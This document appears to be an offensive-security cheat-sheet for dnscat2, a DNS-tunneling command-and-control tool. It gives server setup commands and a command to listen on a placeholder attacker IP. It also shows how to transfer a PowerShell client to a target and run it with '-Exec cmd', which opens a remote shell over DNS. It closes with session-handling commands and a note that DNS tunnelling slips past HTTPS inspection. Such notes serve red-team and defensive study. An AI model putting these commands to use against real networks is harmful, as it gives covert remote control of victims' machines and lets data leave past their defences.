dnscat2
DNS tunneling tool that sends data between two hosts using DNS TXT records over an encrypted C2 channel.
Install (Server)
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install
Start Server
sudo ruby dnscat2.rb --dns host=<ATTACKER_IP>,port=53,domain=<DOMAIN> --no-cache
The server outputs a --secret key for client authentication.
Client (PowerShell)
Clone dnscat2-powershell and transfer dnscat2.ps1 to target.
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <ATTACKER_IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd
Client (Native)
./dnscat --secret=<SECRET> <DOMAIN>
Or connect directly without a domain:
./dnscat --dns server=<ATTACKER_IP>,port=53 --secret=<SECRET>
Session Management
| Command | Description |
|---|---|
windows | List active sessions/windows |
window -i <id> | Interact with a session |
kill <id> | Kill a session |
quit | Exit dnscat2 |
tunnels | List active tunnels |
help | Show available commands |
Interactive Shell
dnscat2> window -i 1
Use ctrl-z to return to the dnscat2 prompt.
Notes
- Uses UDP port 53 by default
- All sessions are encrypted when using
--secret/-PreSharedSecret - Useful for environments where HTTPS is stripped/inspected but DNS is allowed out